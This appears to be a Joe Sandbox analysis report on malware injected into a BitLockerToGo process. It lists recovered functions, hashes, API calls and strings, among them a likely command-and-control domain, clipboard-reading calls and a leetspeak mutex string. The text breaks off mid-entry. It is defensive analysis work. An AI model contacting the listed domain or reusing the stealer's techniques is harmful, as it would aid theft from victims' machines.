Instruction ID: 3f270ec0fb306a6378632caafdd909a10c847075a9e498217b4835e3a0d4f0be
Opcode Fuzzy Hash: c0a62b2721a1e7e8ee69f6159991b1c3aa75ee0f62241893f9c9b96df5f4bf70
Instruction Fuzzy Hash: 6712ADB29093418FD714DF24D8A07AABBF2EB86784F184D2CE6D54B341E7359909CB92

Function 02FD21B0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 290
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 02FD23D9
LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 02FD2493

Strings

XY, xrefs: 02FD22F8
X%Z', xrefs: 02FD22F0
F5H7, xrefs: 02FD22D0
~!f#, xrefs: 02FD22E8
K1w3, xrefs: 02FD2336
m)V+, xrefs: 02FD22D8

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: DrivesLibraryLoadLogical
String ID: F5H7$K1w3$X%Z'$XY$m)V+$~!f#
API String ID: 3125296321-3555836752
Opcode ID: a6cb7b026288e9c6588cb17f297c823e7410419e73b2f7b8228eeb1503beea1c
Instruction ID: b4754bade295db1909f3d9973435dd18e04bce9f60653150b2090481fac0528c
Opcode Fuzzy Hash: a6cb7b026288e9c6588cb17f297c823e7410419e73b2f7b8228eeb1503beea1c
Instruction Fuzzy Hash: ACA1ABB1949201CFD304EF34E850A1AFBE3EB99785F148A2CE6C987351D7359925CF92

Function 02FACC60 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(8B059553,00000104), ref: 02FAD13F

Strings

uk, xrefs: 02FACF2E
charecteristicdxp.shop, xrefs: 02FAD10C
i~}n, xrefs: 02FACDC6
v`en, xrefs: 02FACDB2

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID: charecteristicdxp.shop$i~}n$v`en$uk
API String ID: 2188284642-3509221390
Opcode ID: d2cfb7fbacc8a92993a77346c1849eacd7b1029a90d98451278c38beaec30b5c
Instruction ID: 849b606ed5b92eed7e4abe7511358c1263cc4e405cc2620c31f32f44a30bc5d7
Opcode Fuzzy Hash: d2cfb7fbacc8a92993a77346c1849eacd7b1029a90d98451278c38beaec30b5c
Instruction Fuzzy Hash: BFE1BAB0600B808FD330CF79C895793BBE5AB46354F144A1DE9EA9B795D334B905CB91

Function 02FAAB40 Relevance: 6.7, Strings: 5, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Byz{, xrefs: 02FAACC7
hF\l, xrefs: 02FAAF3D
J, xrefs: 02FAB02C
Aiq6LY3fReQR5MfaD5shs0Qt6Wr7W4V4x_sb5i2pGE4-1725222298-0.0.1.1-/api, xrefs: 02FAB0ED, 02FAB109
h, xrefs: 02FAAB63

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Aiq6LY3fReQR5MfaD5shs0Qt6Wr7W4V4x_sb5i2pGE4-1725222298-0.0.1.1-/api$Byz{$J$h$hF\l
API String ID: 0-3733528406
Opcode ID: d5722c90468dde690ab5a9a76ad5d44731e98cad3a3acfc4a819f02432825656
Instruction ID: 3da77429a5693d74e24671bb1958b75a1a949da15bd3798a1748e26826f0acc7
Opcode Fuzzy Hash: d5722c90468dde690ab5a9a76ad5d44731e98cad3a3acfc4a819f02432825656
Instruction Fuzzy Hash: C7F17AB260C3909BD354CF28C4A065FBBF2AFD1788F589A2DE9D54B351D3758809CB92

Function 02FD2610 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(02FD4BE2,005C003F,00000002,00000018,?), ref: 02FD263E

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 02FD4D10 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

7452, xrefs: 02FD4D14

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: 3b5650a1532712ab2929e7328d45d96f3152166afea186ce52dc9d1a9b95f9f6
Instruction ID: 7d9ee67af4719983291757071a1d96b102026141c588df6b518b6c8b98d00f11
Opcode Fuzzy Hash: 3b5650a1532712ab2929e7328d45d96f3152166afea186ce52dc9d1a9b95f9f6
Instruction Fuzzy Hash: 1D519975A08305AFE315CF28D880B6FB7E3EB84798F58891CE6D997281C735E851CB52

Function 02FD2A34 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d942b2df4c9a8a6f89d4f171f03a4e91ab38ea78f5c4401297e63b45c22ce06
Instruction ID: c4abed7d89a06158182c3ed5d6591364d1a2dcc71de10684e70edb28e49449ff
Opcode Fuzzy Hash: 1d942b2df4c9a8a6f89d4f171f03a4e91ab38ea78f5c4401297e63b45c22ce06
Instruction Fuzzy Hash: BCF14475A41A01CFE324CF29C590B12BBF2FB59784F28895CD58A8BB56D735E851CF80

Function 02FD269E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb5720d8909a3d87c6333bec37edd9b1d4afd636c8f8530ee434522c6f22997
Instruction ID: 5bc4f2e2aa79f5ab643271a0c0a6063b2a859cac8a3ebeca43e7c5fe7ff7392e
Opcode Fuzzy Hash: 2eb5720d8909a3d87c6333bec37edd9b1d4afd636c8f8530ee434522c6f22997
Instruction Fuzzy Hash: 4DB168B5A016018FD324CF29D490B22FBF2FF49354F18895DD9868BB96E335E851CB90

Function 02FAC28C Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edaa4104eeb6c1e102f5b5042f6fbffa1d330c4a10cdff38d25ed1d84eccfa47
Instruction ID: be2e91d92c0006933736c056553eea33798cd4f7752b4d2c59658015429c95e0
Opcode Fuzzy Hash: edaa4104eeb6c1e102f5b5042f6fbffa1d330c4a10cdff38d25ed1d84eccfa47
Instruction Fuzzy Hash: 3C517972641706DFE7248F35E860B26B7B7FB89340F12892CE956C6A90D7B4A821CB40

Function 02FA9110 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE ref: 02FA9242
CloseHandle.KERNEL32 ref: 02FA931D
ExitProcess.KERNEL32 ref: 02FA933A

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 02FA92E3

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: CloseCreateExitHandleMutexProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 1072212991-780655312
Opcode ID: 3a6dbea060e84e44560150cfb17df5c2bf365fd24411fa6cfaa4e4621eb11ec6
Instruction ID: 28c86cf8c68a3c3e6d7e75f30a4257132f1d03d14c07d1bc5941fffb931ac0eb
Opcode Fuzzy Hash: 3a6dbea060e84e44560150cfb17df5c2bf365fd24411fa6cfaa4e4621eb11ec6
Instruction Fuzzy Hash: 8361ACB0408B82DAD3119F38C458715FFE16F523A8F08875CD5E58B6C2D3B9A169CBE2

Function 02FD23D9 Relevance: 3.2, APIs: 2, Instructions: 150
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 02FD23D9
LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 02FD2493

Strings

XY, xrefs: 02FD22F8
X%Z', xrefs: 02FD22F0
F5H7, xrefs: 02FD22D0
~!f#, xrefs: 02FD22E8
K1w3, xrefs: 02FD2336
m)V+, xrefs: 02FD22D8

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: DrivesLibraryLoadLogical
String ID: F5H7$K1w3$X%Z'$XY$m)V+$~!f#
API String ID: 3125296321-3555836752
Opcode ID: 1544aaae4066238f1e5679f2cb23a949530b73de51e3321d7a9f0aaedddb42ca
Instruction ID: fdbc47d7dfecf6f226603bab00c2f7a6d92007c066c3347ca920a5d84a2b0b1e
Opcode Fuzzy Hash: 1544aaae4066238f1e5679f2cb23a949530b73de51e3321d7a9f0aaedddb42ca
Instruction Fuzzy Hash: 5941B172A49202CFD314CF28D86075AF7A7FF8A395F148A6DD6C687381DB34A815CB81

Function 02FD0E52 Relevance: 1.6, APIs: 1, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 02FD0ED6

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 77667ee384df738eb933821b066fa9bea7022d7e3b2b9b7d966f2cffc012ca18
Instruction ID: 3f4321b4979c10480daf158a46cdd4b626b58df49aaa8d3b8670fa30a145dffc
Opcode Fuzzy Hash: 77667ee384df738eb933821b066fa9bea7022d7e3b2b9b7d966f2cffc012ca18
Instruction Fuzzy Hash: 0B019E75645200CFD320CF68D890B56B7B3EBC9759F38866CC69447795C336A812CB80

Function 02FD0DF9 Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 02FD0DFF

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eeeea28a9779a4e4566bcdfebd430f9deb7d6b77f75f0650b075faaee1dd272e
Instruction ID: 2e425d082f80b0e62831399393e975df987c0a5fac8381369d4b10d871da47c9
Opcode Fuzzy Hash: eeeea28a9779a4e4566bcdfebd430f9deb7d6b77f75f0650b075faaee1dd272e
Instruction Fuzzy Hash: 87B0927298000AEAEE116A80BC05BE8F728FB00655F100091E6089A090C3215AB19BC0

Function 02FCB4F5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 02FCB4F5

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: e061a6a7c30b4cd1cc73d41e7b975581e64d9d853a5cafa2fc08a1fa81ddf9b7
Instruction ID: 977c724027bdddfd82d67864005a10a5409e9169930a579ef1d272b8065a03d8
Opcode Fuzzy Hash: e061a6a7c30b4cd1cc73d41e7b975581e64d9d853a5cafa2fc08a1fa81ddf9b7
Instruction Fuzzy Hash: B2B092383046008FC229CE29C190AA1B3E9BFDA300F11080CE4DAC7341C7717902CA01

Non-executed Functions

Function 02FBB2A0 Relevance: 20.7, Strings: 16, Instructions: 719COMMON

Download Yara Rule

Strings

06, xrefs: 02FBB808
[%@', xrefs: 02FBBE47
?];_, xrefs: 02FBBE5D
1m?o, xrefs: 02FBBCC9
789:, xrefs: 02FBC14E
5!, xrefs: 02FBB463
uw, xrefs: 02FBBECB
<?, xrefs: 02FBB7FD
0y6{, xrefs: 02FBBCA8
+q)s, xrefs: 02FBBC92
n=j?, xrefs: 02FBBBED
qs, xrefs: 02FBB67C
):, xrefs: 02FBB7F2
*e8g, xrefs: 02FBBCB3
&4, xrefs: 02FBB813
5a=c, xrefs: 02FBBCBE

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: &4$):$*e8g$+q)s$0y6{$06$1m?o$5a=c$5!$789:$<?$?];_$[%@'$n=j?$qs$uw
API String ID: 0-4002976988
Opcode ID: 056eaad56fe8a1a00f4dac9ccf37f44e3f099df616871c20aabfdc2789c451d3
Instruction ID: 65ce3d301a3bcd83ef7ef82127b50e0f131c6e88ae190c9dc58cb47fd802c969
Opcode Fuzzy Hash: 056eaad56fe8a1a00f4dac9ccf37f44e3f099df616871c20aabfdc2789c451d3
Instruction Fuzzy Hash: DC82D9B4509381CBE3B8CF15D890BDBBBE1FB85344F90892DD9C99B245DB748486CB92

Function 02FAC4D0 Relevance: 19.1, Strings: 15, Instructions: 371COMMON

Download Yara Rule

Strings

DE, xrefs: 02FAC92E
c]|c, xrefs: 02FAC554
3I=O, xrefs: 02FAC52C
B-@3, xrefs: 02FAC4F4
-A2G, xrefs: 02FAC51C
&a>_, xrefs: 02FAC8F6
YuT{, xrefs: 02FAC596
hYh_, xrefs: 02FAC54C
"E5K, xrefs: 02FAC524
charecteristicdxp.shop, xrefs: 02FAC7AB
aUd[, xrefs: 02FAC544
^iUo, xrefs: 02FAC575
T)G/, xrefs: 02FAC4EC
HqDw, xrefs: 02FAC58B
u%U+, xrefs: 02FAC746

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: "E5K$&a>_$-A2G$3I=O$B-@3$DE$HqDw$T)G/$YuT{$^iUo$aUd[$c]|c$charecteristicdxp.shop$hYh_$u%U+
API String ID: 0-121211381
Opcode ID: 7b9dc49c9a32b7c01590e86c153f4c117b4c33ad2eb6bd48993bd96336959ca6
Instruction ID: 70831f856ae2e909d660d9bfa17442c76adb06c3a05ad964d5cf000c76c5be73
Opcode Fuzzy Hash: 7b9dc49c9a32b7c01590e86c153f4c117b4c33ad2eb6bd48993bd96336959ca6
Instruction Fuzzy Hash: 72E163B1549385DFD7208F64D850BABBBF6FB86780F108D2DE6D99B280C7748811CB92

Function 02FB4A9D Relevance: 17.0, Strings: 13, Instructions: 791COMMON

Download Yara Rule

Strings

_L, xrefs: 02FB4DFC
WVSJ, xrefs: 02FB5357
^a, xrefs: 02FB4D4B
?980, xrefs: 02FB5120
!b60, xrefs: 02FB5381
+6*m, xrefs: 02FB5396
f1, , xrefs: 02FB536C
_A@X, xrefs: 02FB5342
j, 9, xrefs: 02FB5373
</)&, xrefs: 02FB538F
#>0{, xrefs: 02FB5388
)a1-, xrefs: 02FB5365
?>#(, xrefs: 02FB537A

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: !b60$#>0{$)a1-$+6*m$</)&$?980$?>#($WVSJ$^a$_A@X$_L$f1, $j, 9
API String ID: 0-1793827405
Opcode ID: 21ec809f109ce98dd0199e881c603a34b7459049692360c1d231ed223dff512a
Instruction ID: 4e6b8179840c9a5caead57c14d9eac868c2e76699d25a2e6e2da3753e6d31cb9
Opcode Fuzzy Hash: 21ec809f109ce98dd0199e881c603a34b7459049692360c1d231ed223dff512a
Instruction Fuzzy Hash: 445276B0604B408FD726CF26C4A07A6BBF2BF45344F58895CD5DA8BB82C779E845CB54

Function 02FCD750 Relevance: 15.2, Strings: 12, Instructions: 234COMMON

Download Yara Rule

Strings

7, xrefs: 02FCD889
7, xrefs: 02FCD9C9
9, xrefs: 02FCD9D3
:, xrefs: 02FCD898
:, xrefs: 02FCD9D8
8, xrefs: 02FCD76C
7, xrefs: 02FCD767
8, xrefs: 02FCD9CE
:, xrefs: 02FCD776
8, xrefs: 02FCD88E
9, xrefs: 02FCD771
9, xrefs: 02FCD893

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 7$7$7$8$8$8$9$9$9$:$:$:
API String ID: 0-119253176
Opcode ID: b7999e428395256205f18f2dd0934ab4afb6a53561b8cfd895f7353be84771e3
Instruction ID: a2d622169095b00498e6a7419b66424717fcef0786a0d3328802cbb03a65581e
Opcode Fuzzy Hash: b7999e428395256205f18f2dd0934ab4afb6a53561b8cfd895f7353be84771e3
Instruction Fuzzy Hash: 26A19E76A0C3828FD315CA28C19075EFBE2ABC5398F65892EE5C997382C775C945CB43

Function 02FC9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 02FC9488
GetSystemMetrics.USER32 ref: 02FC9497
DeleteObject.GDI32 ref: 02FC94E4
SelectObject.GDI32 ref: 02FC9527
SelectObject.GDI32 ref: 02FC9581
DeleteObject.GDI32 ref: 02FC95B2

Strings

, xrefs: 02FC9558

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 95b522a845689ee729e38b5949d87868a7873f387ccf6a70ae74a0b6932b0c97
Instruction ID: b4c95143f78e8b2c516e7dc887291b775aa329a924914900228376afef891b75
Opcode Fuzzy Hash: 95b522a845689ee729e38b5949d87868a7873f387ccf6a70ae74a0b6932b0c97
Instruction Fuzzy Hash: 78417DB09557408FD350EF39D685A1AFBF1BB88344F014A2DE89AC7750E734A859CB42

Function 02FCCCD0 Relevance: 11.5, Strings: 9, Instructions: 277COMMON

Download Yara Rule

Strings

p, xrefs: 02FCCEA7
&, xrefs: 02FCD085
<, xrefs: 02FCD08A
%, xrefs: 02FCD080
~, xrefs: 02FCCEB7
s, xrefs: 02FCCE9F
L, xrefs: 02FCCEAF
C, xrefs: 02FCCCF6
C, xrefs: 02FCCD7A

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %$&$<$C$C$L$p$s$~
API String ID: 0-1646712312
Opcode ID: 1550cc12cffd07673ce18fe7327a1cd034d04a44b71249bbdd5e97597ad36eec
Instruction ID: a832d6f30f09a9335185abc5f4b8febd20547c0a64449311ad9d7bbdf5591c70
Opcode Fuzzy Hash: 1550cc12cffd07673ce18fe7327a1cd034d04a44b71249bbdd5e97597ad36eec
Instruction Fuzzy Hash: DBC13F7260C3C28FD321CA28C58075BBFE1ABD6254F248A5DE5E987392C674D845C7A7

Function 02FA9890 Relevance: 10.3, Strings: 8, Instructions: 349COMMON

Download Yara Rule

Strings

s.,', xrefs: 02FA9938
ekGX, xrefs: 02FA9C98
4@A;, xrefs: 02FA98D5
9@83, xrefs: 02FA98E0
Q+"j, xrefs: 02FA98B4
nU, xrefs: 02FA990C
|, xrefs: 02FA9C61
\ :N, xrefs: 02FA98BF

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4@A;$9@83$Q+"j$\ :N$ekGX$nU$s.,'$|
API String ID: 0-1041402944
Opcode ID: b664942ed83c3a51a1bb95825519ebd2a04c9c275e15c50b26db2e3ab426c529
Instruction ID: 730ac4e17f34b7f818c7ea9dcf58cd112150ae8809f68c38cc395b637b3410da
Opcode Fuzzy Hash: b664942ed83c3a51a1bb95825519ebd2a04c9c275e15c50b26db2e3ab426c529
Instruction Fuzzy Hash: 7CD19AB150C3818FC325CF29C4A065BFBE1AFDA284F18896DE5D99B352C778C945CB92

Function 02FB24DE Relevance: 9.3, Strings: 7, Instructions: 533COMMON

Download Yara Rule

Strings

XY, xrefs: 02FB2614
XL, xrefs: 02FB29D4
2, xrefs: 02FB2832
Z[, xrefs: 02FB261C
XY, xrefs: 02FB2868
cS, xrefs: 02FB260C
RP, xrefs: 02FB29DC

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 2$RP$XL$XY$XY$Z[$cS
API String ID: 0-4083582551
Opcode ID: 12640ee2e04076b4ab625da5b397691661c649d80b31175dd66ff68a51bc87ee
Instruction ID: 2be1515121dfd59e4fbd926f083a4eb434e10d903e50fff56cfb02b4d4bc20f1
Opcode Fuzzy Hash: 12640ee2e04076b4ab625da5b397691661c649d80b31175dd66ff68a51bc87ee
Instruction Fuzzy Hash: B6029A75A083418BD328CF29C4607ABBBF2EFC5394F14892DE9958B391D778D845CB86

Function 02FA9D20 Relevance: 9.2, Strings: 7, Instructions: 426COMMON

Download Yara Rule

Strings

I]T_, xrefs: 02FAA231
XY, xrefs: 02FAA23C
#^V_, xrefs: 02FA9FD8
de, xrefs: 02FAA2D3
[R[*, xrefs: 02FA9F96
+BID, xrefs: 02FA9F9E
0, xrefs: 02FA9D7D

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: #^V_$+BID$0$I]T_$XY$[R[*$de
API String ID: 0-2333049540
Opcode ID: 3c0e48f97c3e800970e3226809e9c95283aab413b5cf94430f257b7493b95f86
Instruction ID: a578f3d90d1f8050fdeb00345fca6bc3a9f39ffdee776a3a2e953e5d512b9fdc
Opcode Fuzzy Hash: 3c0e48f97c3e800970e3226809e9c95283aab413b5cf94430f257b7493b95f86
Instruction Fuzzy Hash: D0F122B0608380ABE314CF25C5A4B6BBBE2EBC5784F40892CF5D98B391D774D805DB92

Function 02FC8B80 Relevance: 9.1, APIs: 6, Instructions: 121clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02FC8BAD
GetWindowLongW.USER32 ref: 02FC8BD8
GetClipboardData.USER32 ref: 02FC8BE8
GlobalLock.KERNEL32 ref: 02FC8C02
GlobalUnlock.KERNEL32 ref: 02FC8CEA
CloseClipboard.USER32 ref: 02FC8CF2

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: bd83e67d291e7b4628ac5925e242de22b259cae739a8de4fd28237893448f647
Instruction ID: f1522e8da17859719d025e817a82fb626594969a4ef52e7aab8912c7515acc11
Opcode Fuzzy Hash: bd83e67d291e7b4628ac5925e242de22b259cae739a8de4fd28237893448f647
Instruction Fuzzy Hash: 05416EB1909B828FD321DF38C548716FFE1AB462A0F04CB6CD5E6876D1D334A415CB92

Function 02FAE110 Relevance: 9.1, Strings: 7, Instructions: 321COMMON

Download Yara Rule

Strings

Jurs, xrefs: 02FADEDE
tUaS, xrefs: 02FADEA6
7452, xrefs: 02FADFB9
O1nO, xrefs: 02FADE75
[%W#, xrefs: 02FADE52
=I;G, xrefs: 02FADE83
Y-S+, xrefs: 02FADE44

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 7452$=I;G$Jurs$O1nO$Y-S+$[%W#$tUaS
API String ID: 0-567526057
Opcode ID: ce57a6176024bd9de7d5efd9db9a651755286141f1f33bb772a666d62eba5fb6
Instruction ID: ffe1b59f107c727d42a2225d13ab452e2fce2e19d4968d1256a173b61d4e767b
Opcode Fuzzy Hash: ce57a6176024bd9de7d5efd9db9a651755286141f1f33bb772a666d62eba5fb6
Instruction Fuzzy Hash: 3BC188B05003018FE328DF25C8A0B66BBB6FF45384F108A6CD6968F696D775E985CF94

Function 02FC2AEA Relevance: 8.5, APIs: 1, Strings: 3, Instructions: 1480COMMON

Download Yara Rule

Strings

RZF/, xrefs: 02FC4598
2PBd, xrefs: 02FC3D1D
789:, xrefs: 02FC3F7F

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 2PBd$789:$RZF/
API String ID: 0-1435807768
Opcode ID: f94606659f56e556be8390404f90dfe338755ae97463c16164338ef7a5804496
Instruction ID: 0225c8e3c27934475e230678a5766c3e9bfd1fa0c01800ae508f20e309860870
Opcode Fuzzy Hash: f94606659f56e556be8390404f90dfe338755ae97463c16164338ef7a5804496
Instruction Fuzzy Hash: 9CB2E370604B428BD329CF39C5647A3BBF2AF56344F248A6DC5EB87792C739A445CB50

Function 02FCDAC0 Relevance: 8.0, Strings: 6, Instructions: 516COMMON

Download Yara Rule

Strings

789:, xrefs: 02FCDEF8
%}|s, xrefs: 02FCDAFC
789:, xrefs: 02FCDE18, 02FCDE5A
789:, xrefs: 02FCE0F8, 02FCE13A, 02FCE1B8, 02FCE1FE
789:, xrefs: 02FCDF2E
U!K, xrefs: 02FCDB38

Memory Dump Source

